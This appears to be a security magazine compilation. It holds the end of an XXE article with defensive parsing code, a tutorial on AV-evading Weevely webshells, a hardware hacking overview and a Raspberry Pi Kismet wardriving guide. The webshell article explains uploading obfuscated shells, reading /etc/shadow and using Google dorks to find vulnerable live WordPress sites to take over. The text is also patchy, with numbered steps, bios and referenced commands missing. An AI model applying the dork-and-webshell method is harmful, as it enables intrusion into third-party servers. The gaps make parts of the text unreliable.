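    values = parse_qs(query, keep_blank_values=True).get(param)
    return values[0] if values else None


# Hypothetical request target as it might appear in an access log.
logged = "/?collect=root%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash"
print(extract_collected(logged))
```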
5. Mitigations
Very often, the libraries used for parsing XML support features that the web application does not strictly need.
Everything that is not strictly necessary, such as the resolution of external entities and the use of DTDs, should be
disabled, following the documentation of the library in use.
For further details, refer to the XXE Prevention Cheat Sheet by OWASP.
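As one possible illustration of disabling DTDs altogether, the Python sketch below refuses any document that carries a DOCTYPE declaration before handing it to the regular parser. It relies only on the standard library; the names DoctypeForbidden and parse_untrusted_xml are assumptions made for this example, and other languages and libraries expose their own switches for the same purpose.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as it meets <!DOCTYPE ...>.
    raise DoctypeForbidden("DOCTYPE declarations are not allowed")


def parse_untrusted_xml(data: str) -> ET.Element:
    """Parse XML only if it declares no DTD, so no entity can be defined."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)  # first pass: raises on DOCTYPE or bad syntax
    return ET.fromstring(data)  # second pass: build the element tree


print(parse_untrusted_xml("<creds><user>alice</user></creds>").find("user").text)
```

Without a DTD there are no custom entities to resolve, which removes both the external entity and the nested entity cases at once, at the cost of rejecting legitimate documents that carry a DOCTYPE.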
Conclusions
It is evident that with time the attack techniques are increasingly refined and are difficult to identify without constant
attention to the problem and continuous learning.
Security should not be seen as a static object but as a continuously evolving process, which starts from the
definition of some basic rules and gradually refines itself over time to counter existing and new threats.
Everyone, without distinction, needs to actively collaborate in defending data and information. On the one
hand, designers and developers need to avoid introducing flaws and to observe and support the effective
improvement of security management rules; on the other hand, users should be cautious and stay informed so that they
can better face the risks of the web.
Bibliography:
• https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
• https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE)
• https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project
• https://portswigger.net/web-security/xxe
• https://portswigger.net/web-security/xxe#exploiting-xxe-to-perform-ssrf-attacks
• https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/
• https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/
• https://www.acunetix.com/blog/articles/band-xml-external-entity-oob-xxe/
• https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
Undetectable Webshells on Penetration Tests Engagements
Hubert Demercado
Elzer Pineda
ABOUT THE AUTHOR
Hubert Demercado
penetration testing both the public and private sectors, specialized design of
ABOUT THE AUTHOR
Elzer Pineda
In several penetration tests, our team has identified servers that allow files to be uploaded and, through them, to
be taken over. Two security controls then have to be defeated: 1. antivirus and 2. intrusion prevention systems.
Either can ruin our chances of compromising the target.
In this article, we will explore one of the techniques that increase the probability of obtaining a remote shell.
The goal is to fully compromise the server by placing obfuscated code that bypasses antivirus detection.
So head over to your Kali terminal and let’s start creating a web shell that most antivirus programs can't detect.
For the shell, we will be using Weevely.
Weevely allows us to create web shell code with many post-exploitation possibilities to escalate privileges and pivot
to internal networks.
First step: generate our shell for the server with Weevely with the following command:
Weevely will ask you for a password that will protect our new generated shell.
Note: The latest version of Kali Linux comes with Weevely pre-installed.
So the previous command generated PHP code that is obfuscated. Let’s see what is inside the new shell:
Did you notice that the antivirus didn’t catch the shell? This type of webshell allows attackers to compromise servers
and perform remote control over them.
Second step: find a target; for that we will be exploiting DVWA, a vulnerable web application.
Note: web applications place filters on file types that are allowed on the server to prevent attackers from uploading
malware. In DVWA, filters are used so that only images can be uploaded (you have to bypass that).
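From the defender's side, a filter of this kind is stronger when it checks the file content as well as its name. The following Python sketch is a hypothetical illustration, not DVWA's actual filter: it accepts an upload only when the leading bytes match a known image signature and the extension agrees with it.

```python
import os
from typing import Optional

# Well-known leading bytes ("magic numbers") of common image formats.
_SIGNATURES = (
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)
_ALLOWED_EXTENSIONS = {
    "png": {".png"},
    "jpeg": {".jpg", ".jpeg"},
    "gif": {".gif"},
}


def sniff_image_type(content: bytes) -> Optional[str]:
    """Return the image type suggested by the leading bytes, or None."""
    for signature, kind in _SIGNATURES:
        if content.startswith(signature):
            return kind
    return None


def is_acceptable_upload(filename: str, content: bytes) -> bool:
    """Accept only files whose content and extension agree on an image type."""
    kind = sniff_image_type(content)
    if kind is None:
        return False
    extension = os.path.splitext(filename.lower())[1]
    return extension in _ALLOWED_EXTENSIONS[kind]


print(is_acceptable_upload("shell.php", b"<?php echo 1; ?>"))
```

Signature checks are only one layer: a file can start with valid image bytes and still carry code, so uploads should also be stored where the server will never execute them.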
With Weevely, we have an encoded shell protected by a password. We can use the help command to know all the
commands that we could use on our penetration test assessments.
Once you have uploaded the shell on the server (DVWA), you can access it by providing the URL path to Weevely and
the password that you have generated, as shown in the following image:
Access to the server allows us to read critical files such as /etc/passwd and /etc/shadow, download
post-exploitation tools, and so on.
Step three: through Google dorks (a search string that uses advanced search operators to find information that is
not readily available on a website) we can find vulnerable websites (please have pre-authorization, you are the good
guy) that allow us to upload shells. These are some examples of those dorks:
Dork to find vulnerable WordPress plugins that allow you to upload files.
inurl:''/wp-content/plugins/wp-ajax-form-pro/''.
inurl:''/wp-content/plugins/chenpress/''
Through these dorks, you can find vulnerable sites that allow you to upload undetectable webshells like the one we
have generated, allowing control and access to the compromised server as detailed in previous points.
www.centauritech.com
Hardware Hacking
Felipe Hifram
Deivison Franco
Leandro Trindade
ABOUT THE AUTHOR
Felipe Hifram
ABOUT THE AUTHOR
Deivison Franco
Sciences (SBCF). C|EH, C|HFI, DSFE and ISO 27002 Senior Manager. Author and
ABOUT THE AUTHOR
Leandro Trindade
Hardware security is not traditional cybersecurity, but a fusion of cybersecurity with other engineering disciplines, like
embedded computing and electronics. So, it addresses much more than mere data, servers, network infrastructure and
information security. Rather, it includes the direct or distributed monitoring and/or control of the state of physical
systems, whether or not they are connected over the Internet.
In other words, a large part of what distinguishes hardware security from cybersecurity is what many industry
practitioners today refer to as cyber-physical systems. Cybersecurity, if you like that term at all, generally does not
address the physical and security aspects of the hardware device or the physical world interactions it can have.
Digital control of physical processes over networks makes the hardware devices unique in that the security equation is
not limited to basic information assurance principles of confidentiality, integrity, non-repudiation and so on, but also
that of physical resources and machines that originate and receive that information in the physical world. Therefore,
hardware devices have very real analog and physical elements, just because they are physical things. So, the
compromise of such devices may lead to physical harm of persons and property, even death.
Also, with physical devices, attackers have more options, and it should be noted that breaking a specific device may
not be the ultimate goal. As intruders over the Internet, we only have exposed network services to work with (for
"educational purposes"). But when testing a physical device, the attack surface can be much larger,
including network services, radio frequency input/output, chip debugging, exposed serial ports, memory extraction,
and so on.
In addition, after breaching the security of a physical device, it is possible to use discovered vulnerabilities (or
extracted access keys) to compromise other devices, and this is often the main purpose.
Rooting every device individually is not feasible, whereas compromising one device and using its information to
compromise others is much more efficient for an attacker.
Introduction
The word "hacking" in terms of hardware is often misused. In the commonly accepted definition, "hardware hacking"
means modifying an existing piece of electronics to use it in a way that was not necessarily intended. Even this
definition is vague, as it can refer to any kind of hardware modification, be it to the enclosure, the electronics, or
the behavior.
Modifying a device's case is usually simple: drill a hole, cut a slot, etc. But hacking the electronics and/or
behavior is a tricky business in itself. When trying to modify a device, it is sometimes difficult to know where to begin
and what angle of attack to take when pushing something toward a purpose for which it was not designed.
If you want to break into a piece of hardware, the way you approach it depends on what you are trying to do. Are you
trying to make it wireless? Are you trying to change what is displayed? Are you trying to get it to trigger another
device? Each intrusion requires a different angle of attack and it is difficult to decide how to proceed if you have never
hacked a device before.
Following are some common hardware hacking methods and the applications in which they are used. This is by
no means a "how to hack hardware" tutorial; such an article could never be complete. The nature of hacking means that
there is always a new creative way to solve a problem, but these are some common methods we have used in our experiments.
Methods
Input/Output Patching
The first (and arguably the easiest) method of breaking into a device is to patch its control mechanism. Most consumer
products have at least one button or indicator LED, and connections to this component are usually easy to find and
solder.
With access to a button, you can connect your own button, relay or transistor circuit to control it with your own hardware.
For example, if you want to make a device wireless, you can wire a wireless module directly to the buttons and drive
each button line high or low depending on what the module receives. We see this kind of implementation all the time.
There is an article on Hackaday, for example, about a user named Kolumkilli hacking his Keurig coffee maker so that it
could be controlled wirelessly. He accomplished this by locating the "brew" buttons and wiring in a wireless device
(Figure 1). This type of hack can be performed without delving into the actual programming of the device.
With access to the LED pads on a device, for example, you have a reliable device output source. The best example we
have ever seen of this is a trick with the Star Wars Force Trainer (Figure 2).
1 https://hackaday.com/2013/11/12/wireless-keurig-hack/
In this hack, the designers simply soldered wires to the LEDs in the base of the toy to trigger their own device when
certain LEDs were lit. They could then use the toy as a controller for their own system without having to access the
data on the device.
Component Replacement
This method is often used in circuit bending. You want the device to sound different, so you replace a component (usually
experimentally) to get a different sound from it. This type of approach is not limited to circuit bending,
however.
Many interesting hacks have been achieved by replacing a component. For example, replacing bicycle lamps with high
intensity LEDs (Figure 3) or replacing the motor in a toy car to make it faster (Figure 4).
2 https://hackaday.com/2015/02/22/use-the-force-luketo-turn-off-your-tv/
3 http://hackedgadgets.com/2006/10/05/antique-bike-light-led-mod/
Logic Analyzer
You can gather a lot of "private" data from a device using a simple logic analyzer. To do this, simply find a chip or test
point on a circuit board, connect a logic analyzer, and then run the device.
The logic analyzer will record any signals that occur on the lines it sniffs, and this data can potentially be translated
into something useful.
We once hacked a Saleae rangefinder (Figure 5) this way, probing its serial lines while it was running. For this, we used
a Saleae Logic Analyzer (Figure 6), which automatically detects the baud rate and translates signals into the SPI, I2C
and serial protocols, making it a vital tool in a hardware hacking toolkit.
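To give an idea of what "translating signals" involves, here is a minimal Python sketch that decodes asynchronous serial data from raw samples. It assumes the common 8N1 framing (idle-high line, one start bit, eight data bits sent least significant bit first, one stop bit) and a known number of samples per bit; it does not detect the baud rate and is not how the Saleae software is implemented. The helper encode_uart_8n1 exists only to produce test input.

```python
def encode_uart_8n1(payload: bytes, samples_per_bit: int, idle_bits: int = 2) -> list:
    """Build a list of 0/1 samples for `payload` (test helper)."""
    samples = [1] * (idle_bits * samples_per_bit)  # line idles high
    for byte in payload:
        bits = [0] + [(byte >> n) & 1 for n in range(8)] + [1]
        for bit in bits:
            samples.extend([bit] * samples_per_bit)
    samples.extend([1] * (idle_bits * samples_per_bit))
    return samples


def decode_uart_8n1(samples: list, samples_per_bit: int) -> bytes:
    """Decode idle-high 8N1 frames from a list of 0/1 samples."""
    decoded = bytearray()
    frame_len = 10 * samples_per_bit  # start + 8 data + stop
    i = 0
    while i + frame_len <= len(samples):
        if samples[i] == 1:  # still idle, keep looking for a start bit
            i += 1
            continue
        middle = i + samples_per_bit // 2  # sample each bit near its center
        bits = [samples[middle + n * samples_per_bit] for n in range(10)]
        start, data, stop = bits[0], bits[1:9], bits[9]
        if start == 0 and stop == 1:
            decoded.append(sum(bit << n for n, bit in enumerate(data)))
            i += frame_len
        else:
            i += 1  # framing error: resynchronize one sample later
    return bytes(decoded)


print(decode_uart_8n1(encode_uart_8n1(b"U0", 8), 8))
```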
4 https://www.youtube.com/watch?v=WkD82ZjcRIY
5 https://www.sparkfun.com/products/13196
When an electronic device is manufactured, it must be programmed with firmware at some point. The same
port through which a device is programmed can therefore also be used to extract and hack the firmware.
Many microcontrollers have a memory dump feature that can be triggered through their programming port and allows
the user to read the full memory of the chip (in hex).
Many chips also include a feature that "locks" the device so that it cannot be read or reprogrammed after
programming. However, many device manufacturers do not enable this feature, leaving their products susceptible
to firmware attacks. Such an attack requires the following steps:
1. Identify the device and if it has the ability to dump its memory;
2. Build or buy a programmer that can receive this memory dump and transmit it to a computer;
5. With the assembly language in hand, you are looking at the firmware itself and can modify it as desired,
changing variables and registers to alter the behavior of the device;
6. Then reassemble the firmware into hexadecimal and reprogram the device with the modified firmware.
This is an advanced method of hardware hacking, and one that can provide the most effective results.
A good example of this type of hacking is GoodFET (7), a device developed by Travis Goodspeed that serves, among
other things, to trigger a hex dump of and reprogram the flash memory of several platforms (MSP430, AVR and PIC, for
example), making it easy to download or view the code hosted on a chip.
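Firmware dumps are often exchanged as Intel HEX text files. Whether a given programmer produces this format is an assumption here, so treat the following Python sketch as an illustration of reading a hex dump rather than a description of any specific tool. It verifies each record's checksum and collects the data bytes by address; extended address records are ignored to keep it short.

```python
def parse_intel_hex_record(line: str) -> dict:
    """Parse one Intel HEX record of the form :LLAAAATT<data>CC."""
    line = line.strip()
    if not line.startswith(":"):
        raise ValueError("record must start with ':'")
    raw = bytes.fromhex(line[1:])
    if len(raw) < 5:
        raise ValueError("record too short")
    length, record_type = raw[0], raw[3]
    address = (raw[1] << 8) | raw[2]
    data = raw[4:-1]
    if len(data) != length:
        raise ValueError("length field does not match data size")
    # All bytes, checksum included, must sum to zero modulo 256.
    if sum(raw) & 0xFF != 0:
        raise ValueError("checksum mismatch")
    return {"address": address, "type": record_type, "data": data}


def load_intel_hex(text: str) -> dict:
    """Return {address: byte} for data records (type 00) up to end-of-file (01)."""
    memory = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        record = parse_intel_hex_record(line)
        if record["type"] == 0x00:
            for offset, byte in enumerate(record["data"]):
                memory[record["address"] + offset] = byte
        elif record["type"] == 0x01:
            break
        # Other record types (extended addressing) are skipped in this sketch.
    return memory


dump = ":10010000214601360121470136007EFE09D2190140\n:00000001FF\n"
memory = load_intel_hex(dump)
print(len(memory), hex(memory[0x0100]))
```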
6 https://www.saleae.com/pt/downloads/
7 http://goodfet.sourceforge.net/
Exposed Services
Exposed services on the device can be compromised, and there is not much to add beyond the vulnerabilities already
known from applications and infrastructure.
The vulnerability of an exposed service could be something as simple as outdated software or something as
complex as command injection and code manipulation. However, it is noteworthy that a hardware attacker could
inform an application attacker, or vice versa, about a particular vulnerability encountered and thereby guide the
related attack.
For example, a command injection vulnerability in a device's administrative interface is as critical as access to an
application's source code. In this sense, hardware hacking techniques can lead to the extraction of source code from a
device. To illustrate an exposed service, Figure 7 shows exposed network services on a hardware
connectivity platform.
Hardware devices do not communicate only over common cables or protocols such as Wi-Fi; there are
other forms of connectivity.
A good example was presented in a talk by security researcher Natalie Silvanovich (9), in
which she discussed hacking Tamagotchi hardware through its infrared (IR) communication.
8 https://www.digi.com/resources/documentation/digidocs/90001929/Content/Task/T_config_netservices.htm
9 https://www.youtube.com/watch?v=0JzORzMnm-E
In the context of Radio Frequency (RF) hardware hacking, there are several attackable platforms, such as
Bluetooth Low Energy (BLE), ZigBee and FM RDS. An attack on RF communications can be carried out with a
software-defined radio (SDR), a radio communication system in which components typically built in hardware (frequency
mixers, filters, amplifiers, modulators/demodulators, detectors, etc.) are implemented in software instead.
In this context you will come across the term Universal Software Radio Peripheral (USRP), the range of
software-defined radios designed and sold by Ettus Research, which are not necessarily robust. Figure 8 shows an Ettus
USRP B200mini, which covers frequencies from 70 MHz to 6 GHz.
Chip Debugging
Hardware frequently has built-in testing mechanisms, which are commonly harnessed by attackers to compromise
devices. However, such mechanisms exist for an important reason - when manufacturing hardware, it is pertinent to
have a way to test them when they are ready, and to answer questions such as: Was the manufacturing process
successful? If a customer returns a device claiming a defect, is it possible to prove the defect? If it is defective, how was
it damaged?
On-chip interfaces that allow interaction with the system can help answer these questions and solve these problems.
However, they can also facilitate improper access and allow the device's security to be breached.
In this scenario, much is said about the Joint Test Action Group (JTAG), a standard for verifying and testing hardware
devices. The JTAG (IEEE 1149.x) standard does not define a connector type, but a serial protocol for interacting with
chips. The interface can often be found on the board as a set of pins positioned to one side, but sometimes it can only
be reached by attaching directly to the pins of the controller. Figure 9 shows an example of JTAG exposed on a board as
a set of connectors.
10 https://www.ettus.com/all-products/usrp-b200mini/
Serial or Universal Asynchronous Receiver/Transmitter (UART) connections are built-in connections that allow you to
verify device behavior and, in some cases, provide inputs if needed.
UART is a generic term for serial input and output, but generally refers to a connection on a device that provides
text-based output. You can often connect to the device with a USB-to-UART adapter and use a terminal emulator like
PuTTY to interact with the running operating system or receive debug output. Figure 10 illustrates this scenario.
Memory Extraction
Many hardware devices have storage chips from which you can extract content, and that content is not necessarily
encrypted. Where content is encrypted, additional work is required to extract the encryption key. However, it is often
possible to access the storage chip, interact with it to dump its contents, and then analyze the software the system
runs, modify it directly, or change the access key and expose services such as Telnet/SSH, as well as disable
firewalls such as iptables on embedded Linux systems.
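A common first step when analyzing an unencrypted dump is to look for readable text, in the spirit of the Unix strings utility. The Python sketch below shows the idea; the function name and the sample bytes are made up for illustration.

```python
import re


def extract_strings(blob: bytes, min_length: int = 4) -> list:
    """Return runs of printable ASCII of at least `min_length` characters."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_length)
    return [match.group().decode("ascii") for match in pattern.finditer(blob)]


# Hypothetical fragment of a memory dump.
sample_dump = b"\x00\x01root:x:0:0\xff\xfeab\x00telnetd\x00"
print(extract_strings(sample_dump))
```

File paths, service names and credentials found this way often indicate which parts of the image deserve closer analysis.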
11 https://sysprogs.com/VisualKernel/tutorials/imx6/jtag/
12 https://www.gracefulsecurity.com/jtagulator-introduction/
13 https://rusolut.com/direct-access-to-nand-and-physical-image-extraction/
14 https://rusolut.com/xor-scrambler-key-extraction/
Conclusion
The new age of hardware is changing everything. Unfortunately, many industries, owners of consumer and commercial
technology devices, and infrastructure operators are fast finding themselves on the precipice of a security
nightmare. The drive to make all devices "smart" is creating a frenzy of opportunity for cyber-criminals, nation-state
actors and security researchers alike. These threats will only grow in their potential impact on the economy,
corporations, business transactions, individual privacy and safety.
Now consider the world of the hardware devices with embedded systems like smart refrigerators, connected washing
machines, automobiles, wearables, implantable medical devices, factory robotics systems and just about anything
newly connected over networks. Historically, many of these industries never had to be concerned with security.
Given the above, this article explored the hardware hacking theme by illustrating how an attacker can compromise the
security of a hardware device and modify its factory settings by customizing them for their purposes.
Wardriving, rebooted and updated, part 1, let’s get started!
Paul Mellen
ABOUT THE AUTHOR
Paul Mellen
Paul has worked in the IT Industry for almost 25 years, over 15 of those in IT
is qualified and certified in all of those areas and now passes on that
possible.
Introduction
In hacker folklore, Wardriving gained its name from Wardialing, which first came into public awareness in the 1983
film "Wargames" (certainly public awareness is different to the heightened awareness that the hackers of then and now
enjoy!). In the film, the protagonist used his computer to dial a huge quantity of telephone numbers in search of phone
connected computer systems.
Similarly, wardriving is the art, some would say sport, of discovering Wi-Fi devices (as opposed to devices connected
or networked via the phone system). As such, Wardriving and Wi-Fi discovery is a topic that has always fascinated
security professionals, primarily because Wi-Fi networks, even with encryption enabled, should be considered
“open” networks. This is, in fact, the philosophy of PCI DSS and other mainstream IT security compliance standards!
The concepts, hardware, and software used to perform wardriving are now well established. The hardware
components used can be considered "Commercial Off The Shelf” (COTS) and are readily available. However, careful
selection of said components is required, to ensure that the hardware not only functions as required, but also that all
elements interact correctly together.
The intrigue and fascination have recently been reinforced by the University of Washington’s SeaGlass project
(https://seaglass.cs.washington.edu/), which very obviously uses many of the concepts of Wardriving, clearly with
some differences to support the different use case, especially for the technologies used.
2019 has been a year in which several key announcements have made it necessary to renew and refresh the hardware
and software used for wardriving and Wi-Fi discovery. In early 2019, Kismet, which is widely regarded as the blue
ribbon Wi-Fi discovery software, underwent major upgrades in architecture and usability, together with increased
support for different wireless devices, not just Wi-Fi devices! In June 2019, the Raspberry Pi Foundation released the
Raspberry Pi 4 Model B, with many upgrades to performance (the relevant upgrades are detailed below).
It is this combination of Raspberry Pi 4 Model B and the new version of Kismet that this article covers, with a full and
comprehensive guide to installation, configuration and setup, that will enable the reader to accurately, precisely and
efficiently discover Wi-Fi networks. Furthermore, using the concepts detailed here in this article will arm the reader
with the expertise to work with other wireless technologies, for example, Bluetooth, using specialised, dedicated
wireless capture hardware.
It is rare in the world of PCI DSS compliance that cardholder data is conveyed through a regular Wi-Fi network. If
wireless is used, typically different channels, frequencies, and protocols are used. However, this does not diminish the
necessity for Wi-Fi discovery in the context of PCI DSS (or other compliance standards). It must be determined whether an
individual, well-meaning or malicious, has attached a Wi-Fi device without permission or “out of policy”, either
directly to a network (a so-called rogue access point) or to a computer system. Any such device needs to be
identified, located and, if determined illegitimate, disconnected and removed.
There are several methods to do this. One is a physical inspection of systems and the environment. This is useful when
the location of Wi-Fi devices is known, and it does indicate if the inspected devices have been tampered with. The
method has a flaw, though: radio frequencies cannot be seen, so its ability to locate a "rogue" device is limited!
Many Wi-Fi manufacturers today include "built-in" Wi-Fi discovery and intrusion detection. To rely on a
manufacturer’s or vendor’s built-in discovery, detection and WIDS is to rely on what is essentially "black box"
technology, frequently proprietary, potentially with limited drill down and limited understanding of the
environment and how Wi-Fi signals are propagating.
Using Kismet with appropriate hardware and software addresses both of these limitations, being able to locate hidden
devices and having the capability to drill down into the data that enables a greater technical understanding of what the
actual scenario is.
This is Part 1 of a 2-part series on Wi-Fi discovery and Wardriving. This article, Part 1, details the construction,
software build, base configuration and some very useful diagnostics. The main focus of this Part 1 is the software setup
and configuration.
Part 2 will take the unit constructed in Part 1 and will cover advanced usage, data processing and reporting.
New Raspberry Pi 4
With the release of the Raspberry Pi 4 Model B came a slew of upgrades and new features. Excitingly, many new
features and improvements are still to come, for example, booting from USB rather than a micro SD card. A brief
overview of these new features and upgrades that are relevant to this guide and specifically for creating a unit for
Wi-Fi discovery, ordered as positives and negatives, are as follows:
● Positives
○ CPU – 1.5GHz 64-bit quad-core ARM Cortex-A72 CPU (ARM v8, BCM2711B0) - An increase in
processing power, which is certainly welcome.
○ RAM - 1GB, 2GB or 4GB RAM (LPDDR4) - Again, a welcome upgrade. Especially for the build and
compilation of Kismet. For this article, the higher specification 4GB model is recommended and used.
○ Gigabit ethernet - The performance of the actual ethernet port is upgraded, so now full gigabit
bandwidth/speeds for ethernet is available.
○ Micro-SD card slot - Again, the actual bandwidth or speed of the micro SD card slot has been
increased. The microSD card reader on the Raspberry Pi 4 now has a theoretical maximum of around 50
MBps, which is double the bandwidth of a Raspberry Pi 3 B+!
○ USB-C power - The change from micro USB to USB-C allows more power to be supplied. However, the
implementation is somewhat flawed in so far as not "all" USB-C power supplies and cables will function
correctly (see below for specific details).
○ USB On The Go (OTG) – The Raspberry Pi 4 USB-C port has On The Go enabled. Depending on how the
unit will be used, this could prove very useful for connectivity, for example as an Ethernet and/or mass
storage device.
○ USB device connectivity - 2x USB 3.0 ports, 2x USB 2.0 ports. The USB 3.0 ports are a very welcome
addition and pave the way for higher speed booting from external storage devices. Booting from external
storage is a road mapped firmware update.
○ Road mapped feature – There is a road mapped feature that will be provided as a firmware update to
enable the Raspberry Pi 4 to be booted from an external storage device. This combined with the USB 3.0
upgrade will allow both non reliance on the Micro SD card and faster boot up and generally enhanced disk
I/O related performance.
The following positives are not related to the recent upgrades for the Raspberry Pi 4; however, they are indicative of
the strength in depth that the Raspberry Pi product line has developed over its years of existence, and they are still
very noteworthy and important:
○ Low cost - The cost of a Raspberry Pi 4 model B ranges from £34.00 for a 1GB version to £54.00 for the
4GB version.
○ GPIO - General Purpose Input/Output pins - The Raspberry Pi Foundation has maintained a large degree of
compatibility between different Raspberry Pi models, as such the Raspberry Pi 4 40 pin GPIO pin out is
backwards compatible. This enables a multitude of different peripherals and accessories that can be used
and re-used. The sheer range of different peripherals is enormous, including (and, of course, not limited
to) GPS devices, mechanical switches (NOT network switches), displays, pressure sensors (potentially for
altitude) inertial sensors such as magnetometer/ compass, gyroscope and accelerometer. Many of these
peripherals and accessories are packaged to make use of the standard format of the GPIO headers,
making prototyping and development very straight forward.
○ Multiple Operating Systems - There is a broad variety of Operating Systems available for the
Raspberry Pi, focused on many different use cases, there is a version of Windows, Android, Linux, and
BSD, to name a few. For the IT Security professional, the outstanding Kali Linux is also available.
○ Massive online community – A huge and varied community of IT professionals, makers and teachers
(a consistent theme for the Raspberry Pi is its use to teach computing) ensures a vibrant ecosystem
with plenty of support.
● Potential negatives
○ Power – with all of the extra resources (CPU, RAM, graphics) there is the potential for increased power
usage
○ USB C Power connector – Unfortunately, the Raspberry Pi 4 power supply circuit does not follow the
specification for USB-C completely! Hence, some power supplies (units, PSUs) with e-marked USB-C
cables will not function with the Raspberry Pi 4. Most notably, the type used by Apple MacBooks and
other laptops. Until the Raspberry Pi 4's circuit/board are revised, it is required to use non e-marked
USB-C cables, with a power supply capable of supplying 5.1V/3A.
○ Heat – The following chips start to generate significant heat under use and load; CPU, USB control,
RAM, Power regulation. If the Raspberry Pi 4 CPU heat exceeds 80°C (176°F), CPU throttling is initiated
in an attempt to reduce the temperature. If a display is visible (not including a SSH terminal), a half-full
red thermometer is presented in the upper right hand corner of the display. If the temperature exceeds
85°C (185°F), the GPU will be throttled as well as the CPU. There are several strategies to manage the heat
generated, as a minimum it is recommended to use heat sinks, however, if this is not sufficient, active
cooling should be added, too.
○ At this point, in the spirit of full disclosure and openness, there is a school of thought that considers the
Raspberry Pi a sub-optimal hardware platform to run Kismet. However, the author considers this
opinion to be based on earlier and less capable models of the Raspberry Pi, for example the Raspberry
Pi Zero. As a business decision, taking into account the increases in performance listed above,
appropriate system configuration and tuning, and the low total cost of hardware and software,
the Raspberry Pi 4 with 4GB of RAM is a compelling platform to carry out Wi-Fi discovery.
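The heat thresholds mentioned above can be checked from a terminal. The following is a minimal sketch, assuming the vcgencmd utility that ships with Raspbian is available; the helper names parse_temp and thermal_state are hypothetical and exist only for this illustration.

```shell
# Convert the output of `vcgencmd measure_temp` (e.g. "temp=61.0'C")
# into a bare number.
parse_temp() {
    printf '%s\n' "$1" | sed -e 's/^temp=//' -e "s/'C\$//"
}

# Classify a temperature against the thresholds quoted in this article:
# above 80°C the CPU is throttled, above 85°C the GPU is throttled as well.
thermal_state() {
    awk -v t="$1" 'BEGIN {
        if (t > 85)      print "cpu+gpu throttled"
        else if (t > 80) print "cpu throttled"
        else             print "ok"
    }'
}

# On the Raspberry Pi itself:
#   thermal_state "$(parse_temp "$(vcgencmd measure_temp)")"
#   vcgencmd get_throttled    # the firmware's own throttling flags
```

Running the check while Kismet is capturing, with the unit inside its case, gives a more realistic reading than an idle measurement on the bench.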
Kismet is an awesome wireless tool, in fact, it's an extensive framework that facilitates wardriving, wireless discovery,
wireless sniffing, wireless network and device detection with built-in WIDS (wireless intrusion detection) capability.
Mike Kershaw, aka Dragorn (Twitter @KismetWireless), is the mastermind behind Kismet. His awesome work,
contributions, and commitment to the Open Source community over decades has been relentless. Thank you, Dragorn,
for your innovation, vision and hard work!
Kismet has been in existence for more than 20 years and as such should need no introduction, REALLY. It has been a
mainstay in pen-testers’ and hackers’ tool chests for all of that time, and many consider it a standard tool. On the
“SecTools.Org: Top 125 Network Security Tools” list (https://sectools.org/), Kismet has always featured highly and is
currently ranked 11th (down slightly from 7th). Whilst other tools can provide subsets of the Kismet framework, none of
them offer the ease of use, framework and comprehensive features of Kismet.
Before the 2019 releases, the previous stable version of Kismet was released in 2016, often referred to as the "legacy"
version. Whilst the "legacy version" is very capable and may be suitable for some applications, the new features and
functionality of the new releases are far too compelling to ignore. A brief summary of just some of those very
interesting new features and functionality includes:
Web-based User Interface - New, cleaner, web-based User Interface that is flexible, intuitive and enables more
complex data to be visualised. The real-time graphs are superb! Furthermore, data sources can be configured from the
web-based User Interface. All accessible from ANY network-connected system. Some screenshots are in the “quick
start” section.
REST API – The 2019 release of Kismet supports a REST-like API interface for the webserver (accessible on TCP port
2501), which accepts commands and returns data.
Logging and data storage improvements - Moving away from the multiple data and log files of the "legacy"
version of Kismet, to a single sqlite3 database file.
Data sources - Not only Wi-Fi data sources are supported. An ever-increasing range of sources is available, including
Bluetooth, Software Defined Radio (SDR) with RTL based devices, and wireless mouse and keyboard support built on the
Bastille Mousejack platform, to name just a few.
Increased release cycle frequency - It's also worth noting that starting with the 2019 releases, Kismet will
attempt to move to a more frequent release cycle, possibly monthly or bi-monthly, so it can incorporate smaller
features and improvements faster.
This is just a very brief overview; Kismet is a large and comprehensive framework that just keeps getting incrementally
better and better. More details, including release details and schedule, regarding Kismet are in the appendix.
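To give a feel for the REST-like API listed above, the following sketch queries a running Kismet server with curl. It is an illustration under assumptions, not a reference: the /system/status.json path and the use of HTTP basic authentication should be checked against the Kismet documentation for the installed release, and KISMET_HOST, KISMET_PORT, KISMET_USER and KISMET_PASS are hypothetical environment variables introduced here.

```shell
# Build a URL for the Kismet web server. Host and port default to a local
# instance on the TCP port named in this article (2501).
kismet_url() {
    printf 'http://%s:%s%s\n' "${KISMET_HOST:-localhost}" "${KISMET_PORT:-2501}" "$1"
}

# Fetch an endpoint and print the JSON reply. KISMET_USER and KISMET_PASS
# are assumed to hold the login created for the web-based User Interface.
kismet_get() {
    curl --silent --fail --user "${KISMET_USER}:${KISMET_PASS}" "$(kismet_url "$1")"
}

# Example, with Kismet running (the credentials are placeholders):
#   KISMET_USER=kismet KISMET_PASS=secret kismet_get /system/status.json
```

Because the API is served by the same webserver as the User Interface, anything reachable this way is also reachable from ANY network-connected system, which is worth remembering when choosing the password.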
Some conventions and terminology will be used from this point on. The intention is to make reading the article more
straight forward:
• Raspberry Pi – For this article, a Raspberry Pi 4 Model B, with 4GB of RAM is recommended and being used.
Referred to as just the “Raspberry Pi”. Other Raspberry Pi’s may be used, however, there may be some
restrictions, for example it is NOT recommended to compile Kismet on anything less than a Raspberry Pi 4
Model B with 4GB of RAM.
• guide – This article, specifically the sections relating to installation, configuration and setup of the Raspberry
Pi with all required software (operating system, drivers and applications).
• unit – The end product of the guide. A capable unit for Wi-Fi discovery and wardriving exercises.
